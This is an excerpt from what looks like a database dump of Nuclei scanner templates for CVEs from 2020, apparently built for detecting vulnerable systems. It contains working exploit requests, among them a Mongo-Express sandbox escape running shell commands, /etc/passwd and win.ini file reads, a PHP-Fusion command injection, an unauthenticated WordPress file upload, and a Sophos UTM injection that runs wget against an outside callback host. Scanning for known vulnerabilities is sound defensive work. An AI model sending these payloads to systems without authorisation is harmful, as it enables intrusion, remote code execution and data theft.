epss-percentile: 0.87791\n cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webdesi9\n product: file_manager\n framework: wordpress\n tags: cve,cve2020,wordpress,backups,plugin,webdesi9\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Index of'\n - 'wp-content/uploads/wp-file-manager-pro/fm_backup'\n - 'backup_'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220457039ce0d9472c9c7f31b2390ffa8f660ae48086aaac7e0cbc18f819873abc502206ba999750bee55d9e2bf5bda1c630a0706596ba612b1c1c330e5e33e913b46ae:922c64590222798bb761d5b6d8e72950", "hash": "661b9903b0e39442875126309e9400a2", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d1" }, "name": "CVE-2020-24391.yaml", "content": "id: CVE-2020-24391\n\ninfo:\n name: Mongo-Express - Remote Code Execution\n author: leovalcante\n severity: critical\n description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/\n - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24391\n - https://github.com/mongodb-js/query-parser/issues/16\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-24391\n epss-score: 0.55667\n epss-percentile: 0.97606\n cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 3\n vendor: mongo-express_project\n product: mongo-express\n framework: node.js\n tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /checkValid HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n - |\n GET /public/css/{{randstr}}.css HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body_3\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n# digest: 4a0a0047304502200b7220be48731b335cab21f60260aa54175107f3ff242575a13060dbca77c791022100ef30764fd9c95d17d3e63194c798c924ddbff9e0b7835808965f3d535a3b783e:922c64590222798bb761d5b6d8e72950", "hash": "b44d1a533943acf396476dcc745159cd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d2" }, "name": "CVE-2020-24550.yaml", "content": "id: CVE-2020-24550\n\ninfo:\n name: EpiServer Find <13.2.7 - Open Redirect\n author: dhiyaneshDK\n severity: medium\n description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability.\n reference:\n - https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24550\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24550\n cwe-id: CWE-601\n epss-score: 0.00144\n epss-percentile: 0.5018\n cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: episerver\n product: find\n tags: cve,cve2020,redirect,episerver\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Location: https://interact.sh\"\n\n - type: status\n status:\n - 301\n# digest: 4a0a00473045022018163727234213b861bfb8914b4d77409e691a7f6f9c7c2465b22354950083a50221008f19141194cbd2b54e09312bac9028670397764fb51b86114e0e9e4397c56f03:922c64590222798bb761d5b6d8e72950", "hash": "acb55f339ae068a0c1d0af49c6fa21a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d3" }, "name": "CVE-2020-24571.yaml", "content": "id: CVE-2020-24571\n\ninfo:\n name: NexusDB <4.50.23 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.\n remediation: |\n Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability.\n reference:\n - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24571\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-24571\n cwe-id: CWE-22\n epss-score: 0.09103\n epss-percentile: 0.94485\n cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nexusdb\n product: nexusdb\n tags: cve,cve2020,nexusdb,lfi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/../../../../../../../../windows/win.ini'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"[extensions]\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202298bb27c5eb5c4f9e4d9d31587ae706b8a807aa6962d3f2aae7019a33cf57ff022023b31f5d74718b2e0d0f3c1b321a5b321ab310304a433831ceb1144c469611d0:922c64590222798bb761d5b6d8e72950", "hash": "bfbb167d9bffaf1e1dba33b29fe2bee4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d4" }, "name": "CVE-2020-24579.yaml", "content": "id: CVE-2020-24579\n\ninfo:\n name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution\n author: pikpikcu\n severity: high\n description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24579\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-24579\n cwe-id: CWE-287\n epss-score: 0.04563\n epss-percentile: 0.9232\n cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dlink\n product: dsl2888a_firmware\n tags: cve,cve2020,dlink,rce\n\nhttp:\n - raw:\n - | # Response:Location: /page/login/login_fail.html\n POST / HTTP/1.1\n Host: {{Hostname}}\n Cookie: uid=6gPjT2ipmNz\n\n username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n - | # Get /etc/passwd\n GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Cookie: uid=6gPjT2ipmNz\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"nobody:[x*]:65534:65534\"\n - \"root:.*:0:0:\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220066bfa74b2f1b728ce53f16ab6639e0ff98246333be3a0ad3fe83f7c64c33bb6022100eaac438fe3d62f74001b2af20f8088179ba40ea0e089b87468ccea9a4689a3d7:922c64590222798bb761d5b6d8e72950", "hash": "c30913ce4a8f50928c22eece00fe61a8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d5" }, "name": "CVE-2020-24589.yaml", "content": "id: CVE-2020-24589\n\ninfo:\n name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection\n author: lethargynavigator\n severity: critical\n description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.\n remediation: |\n Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.\n reference:\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24589\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/athiththan11/WSO2-CVE-Extractor\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2020-24589\n cwe-id: CWE-611\n epss-score: 0.65955\n epss-percentile: 0.97835\n cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wso2\n product: api_manager\n tags: cve2020,cve,wso2,xxe,oast,blind\n\nhttp:\n - raw:\n - |\n POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n payload=<%3fxml+version%3d\"1.0\"+%3f>%25xxe%3b]>\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"Failed to install the generic artifact type\"\n# digest: 4b0a0048304602210090a4585860b08882e0a74df9f647083b80f77dac5ad0dd1b23edda572fabe9f7022100bd4d26f2655c26e67675437452a7565ec16e27eaeb99d4cd108cc9101d9dfc3c:922c64590222798bb761d5b6d8e72950", "hash": "32acc7dfea537582af27b670f10cab6d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d6" }, "name": "CVE-2020-24701.yaml", "content": "id: CVE-2020-24701\n\ninfo:\n name: OX Appsuite - Cross-Site Scripting\n author: DhiyaneshDk\n severity: medium\n description: |\n OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).\n reference:\n - https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html\n - https://seclists.org/fulldisclosure/2021/Jul/33\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24701\n - https://www.open-xchange.com\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24701\n cwe-id: CWE-79\n epss-score: 0.00818\n epss-percentile: 0.81463\n cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: open-xchange\n product: open-xchange_appsuite\n shodan-query: html:\"Appsuite\"\n tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Request with action all'\n - ''\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950", "hash": "8bb8f59abd64e57f57f7be6b96c30370", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d7" }, "name": "CVE-2020-24902.yaml", "content": "id: CVE-2020-24902\n\ninfo:\n name: Quixplorer <=2.4.1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24902\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24902\n cwe-id: CWE-79\n epss-score: 0.00195\n epss-percentile: 0.56453\n cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: quixplorer_project\n product: quixplorer\n shodan-query: http.title:\"My Download Server\"\n google-query: intitle:\"My Download Server\"\n tags: cve,cve2020,quixplorer,xss,quixplorer_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"&srt=yes\"\n - \"My Download\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cc3315a626f72938e1bbd0b8d6123c0a4e45d1f6f608ec22fc41d9b038f25b6d022045f6709f3c37e878675f5ea3caf6f393801ac2d1c850932a039abd8066a934a6:922c64590222798bb761d5b6d8e72950", "hash": "aba20b0c26ad95805784e134d2f49708", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d8" }, "name": "CVE-2020-24903.yaml", "content": "id: CVE-2020-24903\n\ninfo:\n name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks.\n reference:\n - https://seclists.org/bugtraq/2016/Mar/104\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24903\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24903\n cwe-id: CWE-79\n epss-score: 0.00269\n epss-percentile: 0.67095\n cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cutesoft\n product: cute_editor\n framework: asp.net\n shodan-query: http.component:\"ASP.NET\"\n tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";>'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    \"\n - \"System.Web\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008dc31b494c720948586f64df0d6c82addb71bac56f1d7b99d5b94d7c7d698c20022100fdc628af73a6fc813bb7c98900e81ba79c49b4eeafc5fe53895b55f7c2cfb055:922c64590222798bb761d5b6d8e72950", "hash": "57792902c244abcb4771ff05ba3da623", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d9" }, "name": "CVE-2020-24912.yaml", "content": "id: CVE-2020-24912\n\ninfo:\n name: QCube Cross-Site-Scripting\n author: pikpikcu\n severity: medium\n description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03\n - https://github.com/qcubed/qcubed/pull/1320/files\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24912\n - http://seclists.org/fulldisclosure/2021/Mar/30\n - http://qcubed.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24912\n cwe-id: CWE-79\n epss-score: 0.00346\n epss-percentile: 0.7108\n cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: qcubed\n product: qcubed\n tags: cve2020,cve,qcubed,xss,seclists\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/assets/_core/php/profile.php\"\n - \"{{BaseURL}}/assets/php/profile.php\"\n - \"{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php\"\n\n body: \"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n# digest: 4a0a00473045022100a91523e9be74d0fdb90d90a1c3d215030746d376affcf30c8322918bde098fce0220595f4f0288fb85dad8ad6bc73fc2da9fb28c78ed25c2efe66c9d8fdafef1f1a0:922c64590222798bb761d5b6d8e72950", "hash": "4b290db537f50f9c79663c2b4b093d23", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081da" }, "name": "CVE-2020-24949.yaml", "content": "id: CVE-2020-24949\n\ninfo:\n name: PHP-Fusion 9.03.50 - Remote Code Execution\n author: geeknik\n severity: high\n description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion.\n reference:\n - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt\n - https://github.com/php-fusion/PHP-Fusion/issues/2312\n - http://packetstormsecurity.com/files/162852/PHPFusion-9.03.50-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24949\n - https://github.com/404notf0und/CVE-Flow\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-24949\n cwe-id: CWE-77\n epss-score: 0.95694\n epss-percentile: 0.99372\n cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: php-fusion\n product: php-fusion\n tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"infusion_db.php\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e1132de74fa5c19bd76445786a3e75c35af4754b177d7255fd1a8483fca7e5020221008e5612cad816e2750d77b7f4069ca0bc2ebad08c44f2c595b7e4d720e250fedd:922c64590222798bb761d5b6d8e72950", "hash": "0683b8a42a9711b39cdc7b27154fbefa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081db" }, "name": "CVE-2020-25078.yaml", "content": "id: CVE-2020-25078\n\ninfo:\n name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure\n author: pikpikcu\n severity: high\n description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.\n impact: |\n An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.\n remediation: |\n Update the camera firmware to the latest version to fix the vulnerability.\n reference:\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180\n - https://twitter.com/Dogonsecurity/status/1273251236167516161\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25078\n - https://github.com/pen4uin/vulnerability-research-list\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-25078\n epss-score: 0.82526\n epss-percentile: 0.98323\n cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dcs-2530l_firmware\n tags: cve,cve2020,dlink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/config/getuser?index=0\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"name=\"\n - \"pass=\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210084f38f45a1ffb4405c2e1cfd16f202eebc502797887dbe432763b1e64c009b9b022100e56a60ccff7047ec803dae4041a98979a08ccf2ee8deffe36449ac5f234918bd:922c64590222798bb761d5b6d8e72950", "hash": "d34a6ae16a84c5f88fa5e9179b2aba65", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081dc" }, "name": "CVE-2020-25213.yaml", "content": "id: CVE-2020-25213\n\n# Uploaded file will be accessible at:-\n# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt\ninfo:\n name: WordPress File Manager Plugin - Remote Code Execution\n author: foulenzer\n severity: critical\n description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability.\n reference:\n - https://plugins.trac.wordpress.org/changeset/2373068\n - https://github.com/w4fz5uck5/wp-file-manager-0day\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25213\n - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-25213\n cwe-id: CWE-434\n epss-score: 0.97381\n epss-percentile: 0.99899\n cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webdesi9\n product: file_manager\n framework: wordpress\n tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9\n\nhttp:\n - raw:\n - |\n POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"reqid\"\n\n 17457a1fe6959\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"cmd\"\n\n upload\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"target\"\n\n l1_Lw\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"mtime[]\"\n\n 1576045135\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\n Content-Type: text/plain\n\n poc-test\n --------------------------ca81ac1fececda48--\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - poc.txt\n - added\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009764a3380b69d4ec8408e92d8ba889960fbf555098f4ec27add5b2b49a5a6f0e022100edd60e97f49ac3c83ab4d31e41a127aec179ded13d84394542e9ec386121fb1d:922c64590222798bb761d5b6d8e72950", "hash": "81649e77522331f2289158fe3dc296ed", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081dd" }, "name": "CVE-2020-25223.yaml", "content": "id: CVE-2020-25223\n\ninfo:\n name: Sophos UTM Preauth - Remote Code Execution\n author: gy741\n severity: critical\n description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.\n remediation: |\n Apply the latest security patches provided by Sophos to mitigate the vulnerability.\n reference:\n - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223\n - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25223\n - https://community.sophos.com/b/security-blog\n - https://cwe.mitre.org/data/definitions/78.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-25223\n cwe-id: CWE-78\n epss-score: 0.97508\n epss-percentile: 0.99981\n cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sophos\n product: unified_threat_management\n tags: cve,cve2020,sophos,rce,oast,unauth,kev\n\nhttp:\n - raw:\n - |\n POST /var HTTP/1.1\n Host: {{Hostname}}\n Accept: text/javascript, text/html, application/xml, text/xml, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n X-Requested-With: XMLHttpRequest\n X-Prototype-Version: 1.5.1.1\n Content-Type: application/json; charset=UTF-8\n Origin: {{BaseURL}}\n Connection: close\n Referer: {{BaseURL}}\n Sec-Fetch-Dest: empty\n Sec-Fetch-Mode: cors\n Sec-Fetch-Site: same-origin\n\n {\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 